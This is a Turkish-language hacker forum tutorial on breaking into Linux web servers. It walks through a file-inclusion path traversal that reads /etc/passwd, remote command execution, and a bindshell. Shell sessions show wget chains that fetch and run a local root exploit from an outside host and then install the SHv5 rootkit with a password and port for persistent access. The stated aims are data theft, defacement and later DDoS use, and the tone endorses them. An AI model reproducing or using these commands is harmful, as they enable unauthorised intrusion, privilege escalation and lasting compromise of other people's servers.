Bilindiği üzere linux i$letim sistemi çok fazla güvenlik önlemleri olan ve hacklenmesi zor bir sistemdir (not: adminine göre deği$ir) neyse konumuza dönelim senaryoları gözden geçirelim 1.senaryo: iyi bir siteniz var ve insanlar sürekli forumunuza kayıt oluyor ve sisteme çok güveniyorsunuz ve sitenizdende insanlar alı$veri$ yapıyor bir gün geliyorki kullandığınız forum da bir açık bulunmu$ mesela /index.php?page=../../../../../../../../../../etc/passwd gibi yada ------------------------ [hide]http://php.svbo.net/pollvote/pollvot....xxx/uname.txt[/hide] ekrana bakıyorsunuz birde ne görüyorsunuz?
------------ acaba uname.txt içinde ne var aslında çok basit cat uname.txt
bu kadarlık bir komut yani serverın komutlarını kullanabildiğimiz bir komut bununla ne yapabiliriz?? mesela bindsh*ll kurabiliriz sisteme mesela perl de yazılmı$ bindsh*ll kura biliriz sisteme giren kötü niyetli adam siteye index atabilir yada sisteme istediği şeyi yapar...
senaryo 2: şimdi elimizde remote exploitle sisteme dü$tüğümüz bir sistem var diyelim ------------- sh-2.05b$ ls ls bin boot dev etc home lib mnt proc root sbin sys tmp usr var sh-2.05b$ sh-2.05b$ sonra sh-2.05b ifadesinin önünde $ işareti var bu bizim root olmadığımız anlamında whoami komutuyla da bunu görebiliriz şimdi sitemimize göz atalım ve local r00t exploit aramak (yada yazmak) en mantıklısı local r00t exploitimizi sisteme wget ile çekelim... sh-2.05b$wget
www.xxxx.xxx/local/root;chmod
777 root;./root; wget
www.xxxx.xxx/local/root;chmod
777 root;./root; sh-2.05b# evet şimdi mutlu son ancak sistemi neden rootladık sistemdeki bilgileri çalmak için yada hostaki sitelere index atmak için mi yoksa sisteme r00tkit kurup daha sonra kullanacağımız ddos attacklarda kullanmak için mi?? biz en iyisi r00tkit kuralım sh-2.05b# sh-2.05b#wget
www.xxxx.xxx/shv5.tgz;tar
-zxvf shv5.tgz;cd shv5;./setup hacked 30059; wget
www.xxxx.xxx/shv5.tgz;tar
-zxvf shv5.tgz;cd shv5;./setup hacked 30059; ::::::::: ......... ......... ......... sh-2.05b# sh-2.05b# r00tkitimizi de kurduk şimdi kendi açtığımız bindsh*ll i kapatıp sistem den çıkalım sh-2.05b#kill -9 xxxx kill -9 xxxx sh-2.05b# sh-2.05b#exit exit sh-2.05b$exit exit ------------- çıktık evet birdaha sisteme girerken remote yada sistemi rootlamak için local remote exploitle kasmamıza gerek yok sadece rootkit kurduğumuz sistemin adresini ve portu hatırlamak yeter